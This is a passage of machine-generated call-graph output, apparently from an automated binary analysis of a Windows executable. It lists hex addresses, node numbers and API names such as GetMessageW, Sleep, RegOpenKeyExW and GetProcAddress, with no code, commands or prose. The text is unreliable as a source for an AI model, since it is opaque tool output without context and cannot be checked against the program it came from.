be4737 105486->105492 105487 be4727 105536 be8b28 58 API calls __getptd_noexit 105487->105536 105489->105487 105489->105492 105496 be4751 _memmove 105489->105496 105490 be472c 105537 be8db6 9 API calls __wcsnicmp_l 105490->105537 105500 be48dd LeaveCriticalSection LeaveCriticalSection _fprintf 105492->105500 105496->105492 105501 be46e6 105496->105501 105508 bed886 105496->105508 105538 be4a3d 105496->105538 105544 beae1e 78 API calls 7 library calls 105496->105544 105498->105455 105499->105453 105500->105453 105502 be4705 105501->105502 105503 be46f0 105501->105503 105502->105496 105545 be8b28 58 API calls __getptd_noexit 105503->105545 105505 be46f5 105546 be8db6 9 API calls __wcsnicmp_l 105505->105546 105509 bed892 __lseeki64 105508->105509 105510 bed89f 105509->105510 105511 bed8b6 105509->105511 105620 be8af4 58 API calls __getptd_noexit 105510->105620 105513 bed955 105511->105513 105516 bed8ca 105511->105516 105626 be8af4 58 API calls __getptd_noexit 105513->105626 105515 bed8a4 105519 bed8e8 105516->105519 105520 bed8f2 105516->105520 105536->105490 105537->105492 105539 be4a50 105538->105539 105543 be4a74 105538->105543 105540 be46e6 __output_l 58 API calls 105539->105540 105539->105543 105541 be4a6d 105540->105541 105542 bed886 __write 78 API calls 105541->105542 105542->105543 105543->105496 105544->105496 105545->105505 105620->105515 105666 be5349 105665->105666 105669 be535d 105665->105669 105714 be8b28 58 API calls __getptd_noexit 105666->105714 105668 be5359 105683 be5415 LeaveCriticalSection LeaveCriticalSection _fprintf 105668->105683 105669->105668 105670 be4a3d __flush 78 API calls 105669->105670 105672 be5369 105670->105672 105671 be534e 105715 be8db6 9 API calls __wcsnicmp_l 105671->105715 105684 bf0b77 105672->105684 105676 be46e6 __output_l 58 API calls 105681->105466 105682->105470 105683->105470 105685 be5371 105684->105685 105686 bf0b84 105684->105686 105685->105676 105686->105685 105687 be2d55 _free 58 API calls 105686->105687 105687->105685 105714->105671 105715->105668 105760 c23c3e 105759->105760 105761 c24475 FindFirstFileW 105759->105761 105760->104765 105761->105760 105762 c2448a FindClose 105761->105762 105762->105760 105789 bc7a16 105763->105789 105765 bc646a 105796 bc750f 105765->105796 105767 bc6484 Mailbox 105767->104952 105770 bfdff6 105806 c1f8aa 92 API calls 4 library calls 105770->105806 105771 bc750f 59 API calls 105781 bc6265 105771->105781 105775 bc7d8c 59 API calls 105775->105781 105776 bfe004 105777 bc750f 59 API calls 105776->105777 105779 bfe01a 105777->105779 105778 bc6799 _memmove 105807 c1f8aa 92 API calls 4 library calls 105778->105807 105779->105767 105780 bfdf92 105782 bc8029 59 API calls 105780->105782 105781->105765 105781->105770 105781->105771 105781->105775 105781->105778 105781->105780 105785 bc7e4f 59 API calls 105781->105785 105794 bc5f6c 60 API calls 105781->105794 105795 bc5d41 59 API calls Mailbox 105781->105795 105804 bc5e72 60 API calls 105781->105804 105805 bc7924 59 API calls 2 library calls 105781->105805 105784 bfdf9d 105782->105784 105787 be0db6 Mailbox 59 API calls 105784->105787 105786 bc643b CharUpperBuffW 105785->105786 105786->105781 105787->105778 105788->104956 105790 be0db6 Mailbox 59 API calls 105789->105790 105791 bc7a3b 105790->105791 105792 bc8029 59 API calls 105791->105792 105793 bc7a4a 105792->105793 105793->105781 105794->105781 105795->105781 105797 bc75af 105796->105797 105801 bc7522 _memmove 105796->105801 105799 be0db6 Mailbox 59 API calls 105797->105799 105798 be0db6 Mailbox 59 API calls 105800 bc7529 105798->105800 105799->105801 105802 bc7552 105800->105802 105803 be0db6 Mailbox 59 API calls 105800->105803 105801->105798 105802->105767 105803->105802 105804->105781 105805->105781 105806->105776 105807->105767 105809 bc818f 105808->105809 105812 bc81aa 105808->105812 105810 bc7e4f 59 API calls 105809->105810 105811 bc8197 CharUpperBuffW 105810->105811 105811->105812 105812->104775 105814 bcf251 105813->105814 105815 bcf272 105814->105815 105941 c29e4a 90 API calls 4 library calls 105814->105941 105815->104815 105818 bc838d 105817->105818 105819 bfedbd 105817->105819 105820 be0db6 Mailbox 59 API calls 105818->105820 105821 bc8394 105820->105821 105822 bc83b5 105821->105822 105942 bc8634 59 API calls Mailbox 105821->105942 105822->104793 105822->104803 105825 c04cc3 105824->105825 105836 bd09f5 105824->105836 105983 c29e4a 90 API calls 4 library calls 105825->105983 105827 bd0cfa 105827->104823 105829 bd0ee4 105829->105827 105831 bd0ef1 105829->105831 105981 bd1093 342 API calls Mailbox 105831->105981 105832 bd0a4b PeekMessageW 105899 bd0a05 Mailbox 105832->105899 105834 bd0ef8 LockWindowUpdate DestroyWindow GetMessageW 105834->105827 105838 bd0f2a 105834->105838 105836->105899 105984 bc9e5d 60 API calls 105836->105984 105985 c16349 342 API calls 105836->105985 105837 c04e81 Sleep 105837->105899 105841 c05c58 TranslateMessage DispatchMessageW GetMessageW 105838->105841 105839 bd0ce4 105839->105827 105980 bd1070 10 API calls Mailbox 105839->105980 105841->105841 105842 c05c88 105841->105842 105842->105827 105843 bd0ea5 TranslateMessage DispatchMessageW 105844 bd0e43 PeekMessageW 105843->105844 105844->105899 105845 c04d50 TranslateAcceleratorW 105845->105844 105845->105899 105846 bc9e5d 60 API calls 105846->105899 105847 bd0d13 timeGetTime 105847->105899 105848 c0581f WaitForSingleObject 105852 c0583c GetExitCodeProcess CloseHandle 105848->105852 105848->105899 105850 bc8047 59 API calls 105850->105899 105851 bc7667 59 API calls 105885 bd0e70 Mailbox 105851->105885 105883 bd0f95 105852->105883 105853 bd0e5f Sleep 105853->105885 105854 be0db6 59 API calls Mailbox 105854->105899 105855 c05af8 Sleep 105855->105885 105858 be049f timeGetTime 105858->105885 105859 bd0f4e timeGetTime 105982 bc9e5d 60 API calls 105859->105982 105862 c05b8f GetExitCodeProcess 105867 c05ba5 WaitForSingleObject 105862->105867 105868 c05bbb CloseHandle 105862->105868 105863 bc9837 85 API calls 105863->105899 105865 c45f25 111 API calls 105865->105885 105866 bcb7dd 110 API calls 105866->105885 105867->105868 105867->105899 105868->105885 105870 c05874 105870->105883 105871 c05078 Sleep 105871->105899 105872 c05c17 Sleep 105872->105899 105875 bc7de1 59 API calls 105875->105885 105878 bc9ea0 315 API calls 105878->105899 105880 bcf460 315 API calls 105880->105899 105881 bcfce0 315 API calls 105881->105899 105883->104823 105885->105851 105885->105858 105885->105862 105885->105865 105885->105866 105885->105870 105885->105871 105885->105872 105885->105875 105885->105883 105885->105899 105991 c22408 60 API calls 105885->105991 105992 bc9e5d 60 API calls 105885->105992 105993 bc89b3 69 API calls Mailbox 105885->105993 105994 bcb73c 342 API calls 105885->105994 105995 c164da 60 API calls 105885->105995 105996 c25244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105885->105996 105997 c23c55 66 API calls Mailbox 105885->105997 105886 bc84c0 69 API calls 105886->105899 105888 c29e4a 90 API calls 105888->105899 105889 bc9c90 59 API calls Mailbox 105889->105899 105890 c1617e 59 API calls Mailbox 105890->105899 105891 bc82df 59 API calls 105891->105899 105892 bc7de1 59 API calls 105892->105899 105893 bc89b3 69 API calls 105893->105899 105894 c055d5 VariantClear 105894->105899 105895 c16e8f 59 API calls 105895->105899 105896 c0566b VariantClear 105896->105899 105897 c05419 VariantClear 105897->105899 105898 bc8cd4 59 API calls Mailbox 105898->105899 105899->105832 105899->105837 105899->105839 105899->105843 105899->105844 105899->105845 105899->105846 105899->105847 105899->105848 105899->105850 105899->105853 105899->105854 105899->105855 105899->105859 105899->105863 105899->105878 105899->105880 105899->105881 105899->105883 105899->105885 105899->105886 105899->105888 105899->105889 105899->105890 105899->105891 105899->105892 105899->105893 105899->105894 105899->105895 105899->105896 105899->105897 105899->105898 105900 bcb73c 315 API calls 105899->105900 105943 bce6a0 105899->105943 105974 bc31ce 105899->105974 105979 bce420 342 API calls 105899->105979 105986 c46018 59 API calls 105899->105986 105987 c29a15 59 API calls Mailbox 105899->105987 105988 c1d4f2 59 API calls 105899->105988 105989 c160ef 59 API calls 2 library calls 105899->105989 105990 bc8401 59 API calls 105899->105990 105900->105899 105902 bfeda1 105901->105902 105905 bc82f2 105901->105905 105903 bfedb1 105902->105903 106006 c161a4 59 API calls 105902->106006 105906 bc831c 105905->105906 105907 bc85c0 59 API calls 105905->105907 105911 bc8339 Mailbox 105905->105911 105908 bc8322 105906->105908 105909 bc85c0 59 API calls 105906->105909 105907->105906 105910 bc9c90 Mailbox 59 API calls 105908->105910 105908->105911 105909->105908 105910->105911 105911->104832 105912->104829 105913->104829 105914->104777 105915->104837 105916->104786 105917->104837 105918->104837 105919->104789 105920->104798 105921->104799 105922->104799 105924 bc85ce 105923->105924 105930 bc85f6 105923->105930 105925 bc85dc 105924->105925 105927 bc85c0 59 API calls 105924->105927 105926 bc85e2 105925->105926 105928 bc85c0 59 API calls 105925->105928 105929 bc9c90 Mailbox 59 API calls 105926->105929 105926->105930 105927->105925 105928->105926 105929->105930 105930->104802 105931->104829 105932->104829 105933->104829 105935 bc84cb 105934->105935 105937 bc84f2 105935->105937 106007 bc89b3 69 API calls Mailbox 105935->106007 105937->104828 105938->104837 105939->104819 105940->104837 105941->105815 105942->105822 105944 bce6d5 105943->105944 105945 c03aa9 105944->105945 105948 bce73f 105944->105948 105957 bce799 105944->105957 105946 bc9ea0 342 API calls 105945->105946 105947 c03abe 105946->105947 105962 bce970 Mailbox 105947->105962 105999 c29e4a 90 API calls 4 library calls 105947->105999 105951 bc7667 59 API calls 105948->105951 105948->105957 105949 bc7667 59 API calls 105949->105957 105952 c03b04 105951->105952 105954 be2d40 __cinit 67 API calls 105952->105954 105953 be2d40 __cinit 67 API calls 105953->105957 105954->105957 105955 c03b26 105955->105899 105956 bc84c0 69 API calls 105956->105962 105957->105949 105957->105953 105957->105955 105959 bce95a 105957->105959 105957->105962 105958 bc9ea0 342 API calls 105958->105962 105959->105962 106000 c29e4a 90 API calls 4 library calls 105959->106000 105961 c29e4a 90 API calls 105961->105962 105962->105956 105962->105958 105962->105961 105963 bc8d40 59 API calls 105962->105963 105964 bc9c90 Mailbox 59 API calls 105962->105964 105968 bcf195 105962->105968 105973 bcea78 105962->105973 105998 bc7f77 59 API calls 2 library calls 105962->105998 106001 c16e8f 59 API calls 105962->106001 106002 c3c5c3 342 API calls 105962->106002 106003 c3b53c 342 API calls Mailbox 105962->106003 106005 c393c6 342 API calls Mailbox 105962->106005 105963->105962 105964->105962 106004 c29e4a 90 API calls 4 library calls 105968->106004 105972 c03e25 105972->105899 105973->105899 105975 bc3212 105974->105975 105976 bc31e0 105974->105976 105975->105899 105976->105975 105977 bc3205 IsDialogMessageW 105976->105977 105978 bfcf32 GetClassLongW 105976->105978 105977->105975 105977->105976 105978->105976 105978->105977 105979->105899 105980->105829 105981->105834 105982->105899 105983->105836 105984->105836 105985->105836 105986->105899 105987->105899 105988->105899 105989->105899 105990->105899 105991->105885 105992->105885 105993->105885 105994->105885 105995->105885 105996->105885 105997->105885 105998->105962 105999->105962 106000->105962 106001->105962 106002->105962 106003->105962 106004->105972 106005->105962 106006->105903 106007->105937 106009 c160e8 106008->106009 106010 c160cb 106008->106010 106009->104544 106010->106009 106012 c160ab 59 API calls Mailbox 106010->106012 106012->106010 106013->104550 106014->104552 106015->104552 106016->104568 106017 bcbe19 106018 bcbe22 106017->106018 106028 bcbaab 106017->106028 106019 bc9837 85 API calls 106018->106019 106027 bcba8b Mailbox 106018->106027 106018->106028 106020 bcbe4d 106019->106020 106021 bcbe5d 106020->106021 106022 c0107b 106020->106022 106023 bc7a51 59 API calls 106021->106023 106032 c17bdb 59 API calls _memmove 106022->106032 106023->106027 106025 c01085 106026 bc8047 59 API calls 106025->106026 106026->106027 106027->106028 106030 c01361 106027->106030 106034 bc8cd4 59 API calls Mailbox 106027->106034 106030->106028 106033 be3d46 59 API calls __wtof_l 106030->106033 106032->106025 106033->106028 106034->106027 106035 be7c56 106036 be7c62 __lseeki64 106035->106036 106072 be9e08 GetStartupInfoW 106036->106072 106038 be7c67 106074 be8b7c GetProcessHeap 106038->106074 106040 be7cbf 106041 be7cca 106040->106041 106157 be7da6 58 API calls 3 library calls 106040->106157 106075 be9ae6 106041->106075 106044 be7cd0 106045 be7cdb __RTC_Initialize 106044->106045 106158 be7da6 58 API calls 3 library calls 106044->106158 106096 bed5d2 106045->106096 106048 be7cea 106049 be7cf6 GetCommandLineW 106048->106049 106159 be7da6 58 API calls 3 library calls 106048->106159 106115 bf4f23 GetEnvironmentStringsW 106049->106115 106052 be7cf5 106052->106049 106055 be7d10 106056 be7d1b 106055->106056 106160 be30b5 58 API calls 3 library calls 106055->106160 106125 bf4d58 106056->106125 106059 be7d21 106060 be7d2c 106059->106060 106161 be30b5 58 API calls 3 library calls 106059->106161 106139 be30ef 106060->106139 106063 be7d34 106064 be7d3f __wwincmdln 106063->106064 106162 be30b5 58 API calls 3 library calls 106063->106162 106145 bc47d0 106064->106145 106067 be7d53 106068 be7d62 106067->106068 106163 be3358 58 API calls _doexit 106067->106163 106164 be30e0 58 API calls _doexit 106068->106164 106071 be7d67 __lseeki64 106073 be9e1e 106072->106073 106073->106038 106074->106040 106165 be3187 36 API calls 2 library calls 106075->106165 106077 be9aeb 106166 be9d3c InitializeCriticalSectionAndSpinCount ___lock_fhandle 106077->106166 106079 be9af0 106080 be9af4 106079->106080 106168 be9d8a TlsAlloc 106079->106168 106167 be9b5c 61 API calls 2 library calls 106080->106167 106083 be9b06 106083->106080 106085 be9b11 106083->106085 106084 be9af9 106084->106044 106169 be87d5 106085->106169 106088 be9b53 106177 be9b5c 61 API calls 2 library calls 106088->106177 106091 be9b32 106091->106088 106093 be9b38 106091->106093 106092 be9b58 106092->106044 106176 be9a33 58 API calls 4 library calls 106093->106176 106095 be9b40 GetCurrentThreadId 106095->106044 106097 bed5de __lseeki64 106096->106097 106098 be9c0b __lock 58 API calls 106097->106098 106099 bed5e5 106098->106099 106100 be87d5 __calloc_crt 58 API calls 106099->106100 106101 bed5f6 106100->106101 106102 bed661 GetStartupInfoW 106101->106102 106103 bed601 __lseeki64 @_EH4_CallFilterFunc@8 106101->106103 106105 bed7a5 106102->106105 106107 bed676 106102->106107 106103->106048 106104 bed86d 106191 bed87d LeaveCriticalSection _doexit 106104->106191 106105->106104 106109 bed7f2 GetStdHandle 106105->106109 106110 bed805 GetFileType 106105->106110 106190 be9e2b InitializeCriticalSectionAndSpinCount 106105->106190 106107->106105 106108 be87d5 __calloc_crt 58 API calls 106107->106108 106112 bed6c4 106107->106112 106108->106107 106109->106105 106110->106105 106111 bed6f8 GetFileType 106111->106112 106112->106105 106112->106111 106189 be9e2b InitializeCriticalSectionAndSpinCount 106112->106189 106116 be7d06 106115->106116 106117 bf4f34 106115->106117 106121 bf4b1b GetModuleFileNameW 106116->106121 106192 be881d 58 API calls 2 library calls 106117->106192 106119 bf4f5a _memmove 106120 bf4f70 FreeEnvironmentStringsW 106119->106120 106120->106116 106122 bf4b4f _wparse_cmdline 106121->106122 106124 bf4b8f _wparse_cmdline 106122->106124 106193 be881d 58 API calls 2 library calls 106122->106193 106124->106055 106126 bf4d69 106125->106126 106127 bf4d71 __wsetenvp 106125->106127 106126->106059 106128 be87d5 __calloc_crt 58 API calls 106127->106128 106129 bf4d9a __wsetenvp 106128->106129 106129->106126 106131 be87d5 __calloc_crt 58 API calls 106129->106131 106132 bf4df1 106129->106132 106133 bf4e16 106129->106133 106136 bf4e2d 106129->106136 106194 bf4607 58 API calls __wcsnicmp_l 106129->106194 106130 be2d55 _free 58 API calls 106130->106126 106131->106129 106132->106130 106134 be2d55 _free 58 API calls 106133->106134 106134->106126 106195 be8dc6 IsProcessorFeaturePresent 106136->106195 106138 bf4e39 106138->106059 106141 be30fb __IsNonwritableInCurrentImage 106139->106141 106210 bea4d1 106141->106210 106142 be3119 __initterm_e 106143 be2d40 __cinit 67 API calls 106142->106143 106144 be3138 _doexit __IsNonwritableInCurrentImage 106142->106144 106143->106144 106144->106063 106146 bc4889 106145->106146 106147 bc47ea 106145->106147 106146->106067 106148 bc4824 IsThemeActive 106147->106148 106213 be336c 106148->106213 106152 bc4850 106225 bc48fd SystemParametersInfoW SystemParametersInfoW 106152->106225 106154 bc485c 106226 bc3b3a 106154->106226 106156 bc4864 SystemParametersInfoW 106156->106146 106157->106041 106158->106045 106159->106052 106163->106068 106164->106071 106165->106077 106166->106079 106167->106084 106168->106083 106172 be87dc 106169->106172 106171 be8817 106171->106088 106175 be9de6 TlsSetValue 106171->106175 106172->106171 106173 be87fa 106172->106173 106178 bf51f6 106172->106178 106173->106171 106173->106172 106186 bea132 Sleep 106173->106186 106175->106091 106176->106095 106177->106092 106179 bf5201 106178->106179 106185 bf521c 106178->106185 106180 bf520d 106179->106180 106179->106185 106187 be8b28 58 API calls __getptd_noexit 106180->106187 106181 bf522c HeapAlloc 106184 bf5212 106181->106184 106181->106185 106184->106172 106185->106181 106185->106184 106188 be33a1 DecodePointer 106185->106188 106186->106173 106187->106184 106188->106185 106189->106112 106190->106105 106191->106103 106192->106119 106193->106124 106194->106129 106196 be8dd1 106195->106196 106201 be8c59 106196->106201 106200 be8dec 106200->106138 106202 be8c73 _memset __call_reportfault 106201->106202 106203 be8c93 IsDebuggerPresent 106202->106203 106209 bea155 SetUnhandledExceptionFilter UnhandledExceptionFilter 106203->106209 106205 bec5f6 setSBUpLow 6 API calls 106207 be8d7a 106205->106207 106206 be8d57 __call_reportfault 106206->106205 106208 bea140 GetCurrentProcess TerminateProcess 106207->106208 106208->106200 106209->106206 106211 bea4d4 EncodePointer 106210->106211 106211->106211 106212 bea4ee 106211->106212 106212->106142 106214 be9c0b __lock 58 API calls 106213->106214 106215 be3377 DecodePointer EncodePointer 106214->106215 106278 be9d75 LeaveCriticalSection 106215->106278 106217 bc4849 106218 be33d4 106217->106218 106219 be33de 106218->106219 106220 be33f8 106218->106220 106219->106220 106279 be8b28 58 API calls __getptd_noexit 106219->106279 106220->106152 106222 be33e8 106280 be8db6 9 API calls __wcsnicmp_l 106222->106280 106224 be33f3 106224->106152 106225->106154 106227 bc3b47 __ftell_nolock 106226->106227 106228 bc7667 59 API calls 106227->106228 106229 bc3b51 GetCurrentDirectoryW 106228->106229 106281 bc3766 106229->106281 106231 bc3b7a IsDebuggerPresent 106232 bc3b88 106231->106232 106233 bfd272 MessageBoxA 106231->106233 106235 bfd28c 106232->106235 106236 bc3ba5 106232->106236 106265 bc3c61 106232->106265 106233->106235 106234 bc3c68 SetCurrentDirectoryW 106237 bc3c75 Mailbox 106234->106237 106414 bc7213 59 API calls Mailbox 106235->106414 106362 bc7285 106236->106362 106237->106156 106240 bfd29c 106245 bfd2b2 SetCurrentDirectoryW 106240->106245 106245->106237 106265->106234 106278->106217 106279->106222 106280->106224 106282 bc7667 59 API calls 106281->106282 106283 bc377c 106282->106283 106416 bc3d31 106283->106416 106285 bc379a 106286 bc4706 61 API calls 106285->106286 106287 bc37ae 106286->106287 106288 bc7de1 59 API calls 106287->106288 106289 bc37bb 106288->106289 106290 bc4ddd 136 API calls 106289->106290 106291 bc37d4 106290->106291 106292 bc37dc Mailbox 106291->106292 106293 bfd173 106291->106293 106296 bc8047 59 API calls 106292->106296 106458 c2955b 106293->106458 106299 bc37ef 106296->106299 106297 bfd192 106298 be2d55 _free 58 API calls 106297->106298 106301 bfd19f 106298->106301 106430 bc928a 106299->106430 106300 bc4e4a 84 API calls 106300->106297 106303 bc4e4a 84 API calls 106301->106303 106305 bfd1a8 106303->106305 106309 bc3ed0 59 API calls 106305->106309 106306 bc7de1 59 API calls 106307 bc3808 106306->106307 106308 bc84c0 69 API calls 106307->106308 106310 bc381a Mailbox 106308->106310 106311 bfd1c3 106309->106311 106312 bc7de1 59 API calls 106310->106312 106313 bc3ed0 59 API calls 106311->106313 106314 bc3840 106312->106314 106315 bfd1df 106313->106315 106316 bc84c0 69 API calls 106314->106316 106317 bc4706 61 API calls 106315->106317 106319 bc384f Mailbox 106316->106319 106318 bfd204 106317->106318 106320 bc3ed0 59 API calls 106318->106320 106322 bc7667 59 API calls 106319->106322 106321 bfd210 106320->106321 106323 bc8047 59 API calls 106321->106323 106324 bc386d 106322->106324 106325 bfd21e 106323->106325 106433 bc3ed0 106324->106433 106327 bc3ed0 59 API calls 106325->106327 106329 bfd22d 106327->106329 106335 bc8047 59 API calls 106329->106335 106331 bc3887 106331->106305 106332 bc3891 106331->106332 106333 be2efd _W_store_winword 60 API calls 106332->106333 106334 bc389c 106333->106334 106334->106311 106336 bc38a6 106334->106336 106337 bfd24f 106335->106337 106338 be2efd _W_store_winword 60 API calls 106336->106338 106340 bc3ed0 59 API calls 106337->106340 106339 bc38b1 106338->106339 106339->106315 106342 bc38bb 106339->106342 106341 bfd25c 106340->106341 106341->106341 106343 be2efd _W_store_winword 60 API calls 106342->106343 106344 bc38c6 106343->106344 106344->106329 106345 bc3907 106344->106345 106347 bc3ed0 59 API calls 106344->106347 106345->106329 106346 bc3914 106345->106346 106349 bc92ce 59 API calls 106346->106349 106348 bc38ea 106347->106348 106350 bc8047 59 API calls 106348->106350 106351 bc3924 106349->106351 106353 bc38f8 106350->106353 106352 bc9050 59 API calls 106351->106352 106354 bc3932 106352->106354 106355 bc3ed0 59 API calls 106353->106355 106449 bc8ee0 106354->106449 106355->106345 106357 bc394f 106358 bc928a 59 API calls 106357->106358 106359 bc8ee0 60 API calls 106357->106359 106360 bc3ed0 59 API calls 106357->106360 106361 bc3995 Mailbox 106357->106361 106358->106357 106359->106357 106360->106357 106361->106231 106363 bc7292 __ftell_nolock 106362->106363 106364 bc72ab 106363->106364 106365 bfea22 _memset 106363->106365 106366 bc4750 60 API calls 106364->106366 106368 bfea3e GetOpenFileNameW 106365->106368 106367 bc72b4 106366->106367 106498 be0791 106367->106498 106370 bfea8d 106368->106370 106372 bc7bcc 59 API calls 106370->106372 106374 bfeaa2 106372->106374 106374->106374 106375 bc72c9 106516 bc686a 106375->106516 106414->106240 106417 bc3d3e __ftell_nolock 106416->106417 106418 bc7bcc 59 API calls 106417->106418 106429 bc3ea4 Mailbox 106417->106429 106420 bc3d70 106418->106420 106419 bc79f2 59 API calls 106419->106420 106420->106419 106424 bc3da6 Mailbox 106420->106424 106421 bc79f2 59 API calls 106421->106424 106422 bc3e77 106423 bc7de1 59 API calls 106422->106423 106422->106429 106426 bc3e98 106423->106426 106424->106421 106424->106422 106425 bc7de1 59 API calls 106424->106425 106428 bc3f74 59 API calls 106424->106428 106424->106429 106425->106424 106427 bc3f74 59 API calls 106426->106427 106427->106429 106428->106424 106429->106285 106431 be0db6 Mailbox 59 API calls 106430->106431 106432 bc37fb 106431->106432 106432->106306 106434 bc3eda 106433->106434 106435 bc3ef3 106433->106435 106436 bc8047 59 API calls 106434->106436 106437 bc7bcc 59 API calls 106435->106437 106438 bc3879 106436->106438 106437->106438 106439 be2efd 106438->106439 106440 be2f7e 106439->106440 106441 be2f09 106439->106441 106495 be2f90 60 API calls 3 library calls 106440->106495 106448 be2f2e 106441->106448 106493 be8b28 58 API calls __getptd_noexit 106441->106493 106443 be2f8b 106443->106331 106445 be2f15 106494 be8db6 9 API calls __wcsnicmp_l 106445->106494 106447 be2f20 106447->106331 106448->106331 106450 bff17c 106449->106450 106455 bc8ef7 106449->106455 106450->106455 106496 bc8bdb 59 API calls Mailbox 106450->106496 106452 bc8ff8 106456 be0db6 Mailbox 59 API calls 106452->106456 106453 bc9040 106454 bc9d3c 60 API calls 106453->106454 106457 bc8fff 106454->106457 106455->106452 106455->106453 106455->106457 106456->106457 106457->106357 106459 bc4ee5 85 API calls 106458->106459 106460 c295ca 106459->106460 106461 c29734 96 API calls 106460->106461 106462 c295dc 106461->106462 106463 bc4f0b 74 API calls 106462->106463 106491 bfd186 106462->106491 106464 c295f7 106463->106464 106465 bc4f0b 74 API calls 106464->106465 106466 c29607 106465->106466 106467 bc4f0b 74 API calls 106466->106467 106468 c29622 106467->106468 106469 bc4f0b 74 API calls 106468->106469 106470 c2963d 106469->106470 106471 bc4ee5 85 API calls 106470->106471 106472 c29654 106471->106472 106473 be571c __crtGetStringTypeA_stat 58 API calls 106472->106473 106474 c2965b 106473->106474 106475 be571c __crtGetStringTypeA_stat 58 API calls 106474->106475 106476 c29665 106475->106476 106477 bc4f0b 74 API calls 106476->106477 106478 c29679 106477->106478 106479 c29109 GetSystemTimeAsFileTime 106478->106479 106480 c2968c 106479->106480 106481 c296a1 106480->106481 106482 c296b6 106480->106482 106485 be2d55 _free 58 API calls 106481->106485 106483 c2971b 106482->106483 106484 c296bc 106482->106484 106488 be2d55 _free 58 API calls 106483->106488 106497 c28b06 116 API calls __fcloseall 106484->106497 106486 c296a7 106485->106486 106489 be2d55 _free 58 API calls 106486->106489 106488->106491 106489->106491 106490 c29713 106492 be2d55 _free 58 API calls 106490->106492 106491->106297 106491->106300 106492->106491 106493->106445 106494->106447 106495->106443 106496->106455 106497->106490 106499 bf1940 __ftell_nolock 106498->106499 106500 be079e GetLongPathNameW 106499->106500 106501 bc7bcc 59 API calls 106500->106501 106502 bc72bd 106501->106502 106503 bc700b 106502->106503 106504 bc7667 59 API calls 106503->106504 106505 bc701d 106504->106505 106506 bc4750 60 API calls 106505->106506 106507 bc7028 106506->106507 106508 bfe885 106507->106508 106509 bc7033 106507->106509 106514 bfe89f 106508->106514 106556 bc7908 61 API calls 106508->106556 106510 bc3f74 59 API calls 106509->106510 106512 bc703f 106510->106512 106550 bc34c2 106512->106550 106515 bc7052 Mailbox 106515->106375 106517 bc4ddd 136 API calls 106516->106517 106518 bc688f 106517->106518 106519 bfe031 106518->106519 106520 bc4ddd 136 API calls 106518->106520 106521 c2955b 122 API calls 106519->106521 106522 bc68a3 106520->106522 106523 bfe046 106521->106523 106522->106519 106524 bc68ab 106522->106524 106525 bfe04a 106523->106525 106526 bfe067 106523->106526 106528 bc68b7 106524->106528 106529 bfe052 106524->106529 106530 bc4e4a 84 API calls 106525->106530 106527 be0db6 Mailbox 59 API calls 106526->106527 106541 bfe0ac Mailbox 106527->106541 106557 bc6a8c 106528->106557 106655 c242f8 91 API calls _wprintf 106529->106655 106530->106529 106533 bfe060 106533->106526 106535 bfe260 106536 be2d55 _free 58 API calls 106535->106536 106537 bfe268 106536->106537 106538 bc4e4a 84 API calls 106537->106538 106544 bfe271 106538->106544 106539 bc750f 59 API calls 106539->106541 106541->106535 106541->106539 106541->106544 106547 bc7de1 59 API calls 106541->106547 106649 bc735d 106541->106649 106656 c1f73d 59 API calls 2 library calls 106541->106656 106657 c1f65e 61 API calls 2 library calls 106541->106657 106658 c2737f 59 API calls Mailbox 106541->106658 106543 be2d55 _free 58 API calls 106543->106544 106544->106543 106546 bc4e4a 84 API calls 106544->106546 106659 c1f7a1 90 API calls 4 library calls 106544->106659 106546->106544 106547->106541 106551 bc34d4 106550->106551 106555 bc34f3 _memmove 106550->106555 106553 be0db6 Mailbox 59 API calls 106551->106553 106552 be0db6 Mailbox 59 API calls 106554 bc350a 106552->106554 106553->106555 106554->106515 106555->106552 106556->106508 106558 bfe41e 106557->106558 106559 bc6ab5 106557->106559 106681 c1f7a1 90 API calls 4 library calls 106558->106681 106665 bc57a6 60 API calls Mailbox 106559->106665 106562 bfe431 106682 c1f7a1 90 API calls 4 library calls 106562->106682 106563 bc6ad7 106666 bc57f6 67 API calls 106563->106666 106565 bc6aec 106565->106562 106568 bfe44d 106650 bc7370 106649->106650 106653 bc741e 106649->106653 106651 be0db6 Mailbox 59 API calls 106650->106651 106654 bc73a2 106650->106654 106651->106654 106652 be0db6 59 API calls Mailbox 106652->106654 106653->106541 106654->106652 106654->106653 106655->106533 106656->106541 106657->106541 106658->106541 106659->106544 106665->106563 106666->106565 106681->106562 106682->106568 106736 bc1055 106741 bc2649 106736->106741 106739 be2d40 __cinit 67 API calls 106740 bc1064 106739->106740 106742 bc7667 59 API calls 106741->106742 106743 bc26b7 106742->106743 106748 bc3582 106743->106748 106746 bc2754 106747 bc105a 106746->106747 106751 bc3416 59 API calls 2 library calls 106746->106751 106747->106739 106752 bc35b0 106748->106752 106751->106746 106753 bc35bd 106752->106753 106754 bc35a1 106752->106754 106753->106754 106755 bc35c4 RegOpenKeyExW 106753->106755 106754->106746 106755->106754 106756 bc35de RegQueryValueExW 106755->106756 106757 bc35ff 106756->106757 106758 bc3614 RegCloseKey 106756->106758 106757->106758 106758->106754 106759 bc1016 106764 bc4974 106759->106764 106762 be2d40 __cinit 67 API calls 106763 bc1025 106762->106763 106765 be0db6 Mailbox 59 API calls 106764->106765 106766 bc497c 106765->106766 106767 bc101b 106766->106767 106771 bc4936 106766->106771 106767->106762 106772 bc493f 106771->106772 106773 bc4951 106771->106773 106774 be2d40 __cinit 67 API calls 106772->106774 106775 bc49a0 106773->106775 106774->106773 106776 bc7667 59 API calls 106775->106776 106777 bc49b8 GetVersionExW 106776->106777 106778 bc7bcc 59 API calls 106777->106778 106779 bc49fb 106778->106779 106780 bc7d2c 59 API calls 106779->106780 106791 bc4a28 106779->106791 106781 bc4a1c 106780->106781 106782 bc7726 59 API calls 106781->106782 106782->106791 106783 bc4a93 GetCurrentProcess IsWow64Process 106784 bc4aac 106783->106784 106786 bc4b2b GetSystemInfo 106784->106786 106787 bc4ac2 106784->106787 106785 bfd864 106788 bc4af8 106786->106788 106799 bc4b37 106787->106799 106788->106767 106791->106783 106791->106785 106792 bc4b1f GetSystemInfo 106794 bc4ae9 106792->106794 106793 bc4ad4 106795 bc4b37 2 API calls 106793->106795 106794->106788 106797 bc4aef FreeLibrary 106794->106797 106796 bc4adc GetNativeSystemInfo 106795->106796 106796->106794 106797->106788 106800 bc4ad0 106799->106800 106801 bc4b40 LoadLibraryA 106799->106801 106800->106792 106800->106793 106801->106800 106802 bc4b51 GetProcAddress 106801->106802 106802->106800 106803 bc3633 106804 bc366a 